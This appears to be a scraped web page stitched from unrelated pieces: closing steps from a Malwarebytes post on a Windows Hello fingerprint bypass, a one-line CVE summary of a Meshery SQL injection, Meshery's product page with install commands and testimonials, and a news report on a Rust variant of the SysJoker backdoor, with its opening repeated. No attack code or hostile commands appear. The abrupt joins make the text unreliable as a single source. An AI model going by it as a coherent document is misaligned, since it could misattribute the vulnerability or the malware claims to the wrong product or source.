1.  Type and search **\[Sign-in options\]** in the Windows search bar, then click **\[Open\]**.
2.  Select **\[Fingerprint recognition (Windows Hello)**, then click **\[Remove\]**, and the fingerprint sign-in option will be removed.

Until the manufacturers have dealt with the weaknesses in their setups, we can’t assume that this is a secure method of authentication.

**We don’t just report on threats—we remove them**

Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.

 Windows Hello fingerprint authentication can be bypassed on popular laptops 

A SQL injection vulnerability in Meshery before 0.6.179 allows a remote attacker to obtain sensitive information and execute arbitrary code via the order parameter.

video

**Confidently wrangle cloud native infrastructure**

 

**Support for your Cloud Native Infrastructure and Apps**

Meshery seamlessly integrates with every CNCF project, your existing tools and Kubernetes clusters, allowing you to enhance use your preferred monitoring, CI/CD, and security solutions.

Meshery's Kubernetes-native approach means you can easily incorporate Meshery into your existing workflow without additional setup or integration effort.

**Access the Cloud Native Patterns for Kubernetes**

Design and manage all of your cloud native infrastructure using the design configurator in Meshery or start from a template using the patterns from the catalog.

(excerpt: patterns in-action)

**Service Mesh Patterns**

**×**

 Your browser does not support HTML video.

**Operate with configuration best practices**

Assess your configurations against deployment and operational best practices with Meshery's configuration validator.

**Manage data plane intelligence with WebAssembly filters**

Dynamically load and manage your own WebAssembly filters in Envoy-based service meshes.

**Retrieves and presents the contents of a designated filter through identification by name or ID**

Refer to the documentation here

**Context-Aware Policies For Applications**

Leverage built-in relationships to enforce configuration best practices consistently from code to Kubernetes. Enhance development process by building custom rules in Open Policy Agent's Rego query language.

**Simplify the process of Infrastructure Managment with Meshery Extension**

Streamlining Platform Engineering with GitOps and Meshery. Preview your deployment, view changes pull request-to-pull request and get infrastructure snapshots within your PRs by connecting MeshMap to your GitHub repositories.

*   See your deployment before you merge
*   Connect MeshMap to your GitHub repo and see changes pull request-to-pull request
*   Get snapshots of your infrastructure directly in your PRs

**Manage the performance of your infrastructure and its workloads**

Baseline and track your cloud native performance from release to release.

*   Use performance profiles to track the historical performance of your workloads.
*   Track your application performance from version to version.
*   Understand behavioral differences between cloud native network functions.
*   Compare performance across infrastructure deployments.

**Platform Engineering with Meshery's Extension Points**

Meshery includes both REST APIs and GraphQL APIs, pluggable adapters via gRPCs, hot-loadable ReactJS and hot-loadable Golang binaries. The great number of extension points in Meshery make it ideal as the foundation of your internal deleloper platform.

**Created By**

**Used By**

**Add yourself as an **adopter****

and share your cloud native story with the community

  

**Getting Started****with Meshery**

**01****Choose your Platform**

Choose a platform and see how easy it is to start managing cloud native infrastructure with a single command.

**Bash using Mac or Linux**

Install on Kubernetes

Install on Docker

**Brew User:**

Install on Mac or Linux using Homebrew:

**Docker User:****Get mesheryctl**

Install mesheryctl with Bash, Brew, Scoop, or download directly.

**Use mesheryctl**

mesheryctl system context create docker --platform docker --set
                mesheryctl system start

Copy to clipboard

**Use Docker Extension for Meshery**

docker extension install meshery/docker-extension-meshery:stable-latest

Copy to clipboard

**Windows User:**

**Using Scoop**

 $ scoop bucket add mesheryctl https://github.com/layer5io/scoop-bucket.git
                        $ scoop install mesheryctl
                        $ mesheryctl system start 

Copy to clipboard

**Using Binary**

Not a Scoop user? Download and unzip the mesheryctl binary directly from the Meshery releases page. Add mesheryctl to your path for ease of use. Then, execute:

**Using Helm**

kubectl create ns meshery
              helm repo add meshery https://meshery.io/charts
              helm install meshery-operator meshery/meshery-operator -n meshery
              helm install meshery meshery/meshery -n meshery
            

Copy to clipboard

Don't forget to grab a copy of mesheryctl. Install with Bash, Brew, or Scoop.

**02****Manage your Cloud Native Infra**

There is no step 2. Login and manage cloud native infrastructure!

**Hear what other users have to say...**

❝

> The Meshery Extension transforms Docker Desktop into a powerful load generation utility, conveniently enabling me to deploy and configure any service mesh with a click of the button and invoke and control load-based performance tests from my desktop.

> The precision by which performance measurements are generated and analyzed is a pinnacle focus of Nighthawk. Mesh performance characterization should be distilled from a set of value measurements, and that is where MeshMark compliments to create the ultimate comprehensive efficiency calculation.

> Meshery is the perfect tool for ensuring that your cloud native applications are optimally configured and performing well; it also gives you a fantastic visual insight into what can be a large amount of textual configuration.

❞

> While speed is one of Linkerd's core competitive advantages, Linkerd provides much more than just an ultrafast data plane. We are pleased to support MeshMark's establishment of a higher order set of functional considerations that incorporate value into the performance equation.

> Performance measurement data rarely provides a clear and simple picture of how well our applications are performing from a business point of view, which are so often the key efficiency indicators that we really need.

❝

> Many cloud native adopters have been put off from using service mesh due to the extra resource consumption and complexity that it can involve. We welcome MeshMark as an objective measure of that overhead, to help drive efficiency and make it easier for users to compare service mesh options.

❞

> The fact that MeshMap automatically renders our Kubernetes configuration is a game-changer for our team.

❝

> It was an intuitive experience to visually place and configure various components saving the time of going through 10 different YAML files.

❝

> Are my resources utilized as best as possible? Why am I not getting the SLO met with 4 resources when I only needed 1 resource without the service mesh? How can I improve my 99.9% latencies or can I map my service policy to utilization? MeshMark will model and provide an index in answer to such questions.

> With a goal to bring workload identity and attestation to all service meshes, HPE Security Engineering uses the Meshery Docker Extension to deploy their service mesh of choice and test the performance of our SPIFFE and SPIRE-based identity solution.

❞

> The Meshery Docker Extension offers an easy button to go from Docker Compose to Kubernetes to any service mesh.

**MESHERY IS A CLOUD NATIVE COMPUTING FOUNDATION PROJECT**

Created by  and its open source community.

**Project Mailing lists**

Engage in the Meshery project. Join any of our mailing lists.

CVE-2023-46575: Meshery The Kubernetes and Cloud Native Manager - an extensible developer platform

Cybersecurity researchers have shed light on a Rust version of a cross-platform backdoor called SysJoker, which is assessed to have been used by a Hamas-affiliated threat actor to target Israel amid the ongoing war in the region.
“Among the most prominent changes is the shift to Rust language, which indicates the malware code was entirely rewritten, while still maintaining similar

Cybersecurity researchers have shed light on a Rust version of a cross-platform backdoor called **SysJoker**, which is assessed to have been used by a Hamas-affiliated threat actor to target Israel amid the ongoing war in the region.

"Among the most prominent changes is the shift to Rust language, which indicates the malware code was entirely rewritten, while still maintaining similar functionalities," Check Point said in a Wednesday analysis. "In addition, the threat actor moved to using OneDrive instead of Google Drive to store dynamic C2 (command-and-control server) URLs."

SysJoker was publicly documented by Intezer in January 2022, describing it as a backdoor capable of gathering system information and establishing contact with an attacker-controlled server by accessing a text file hosted on Google Drive that contains a hard-coded URL.

"Being cross-platform allows the malware authors to gain advantage of wide infection on all major platforms," VMware said last year. "SysJoker has the ability to execute commands remotely as well as download and execute new malware on victim machines."

The discovery of a Rust variant of SysJoker points to an evolution of the cross-platform threat, with the implant employing random sleep intervals at various stages of its execution, likely in an effort to evade sandboxes.

One noteworthy shift is the use of OneDrive to retrieve the encrypted and encoded C2 server address, which is subsequently parsed to extract the IP address and port to be used.

"Using OneDrive allows the attackers to easily change the C2 address, which enables them to stay ahead of different reputation-based services," Check Point said. "This behavior remains consistent across different versions of SysJoker."

After establishing connections with the server, the artifact awaits further additional payloads that are then executed on the compromised host.

The cybersecurity company said it also discovered two never-before-seen SysJoker samples designed for Windows that are significantly more complex, one of which utilizing a multi-stage execution process to launch the malware.

SysJoker has not yet been formally attributed to any threat actor or group. But newly gathered evidence shows overlaps between the backdoor and malware samples used in connection with Operation Electric Powder, which refers to a targeted campaign against Israeli organizations between April 2016 and February 2017.

This activity was linked by McAfee to a Hamas-affiliated threat actor known as Molerats (aka Extreme Jackal, Gaza Cyber Gang, and TA402).

"Both campaigns used API-themed URLs and implemented script commands in a similar fashion," Check Point noted, raising the possibility that "the same actor is responsible for both attacks, despite the large time gap between the operations."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Tag

#windows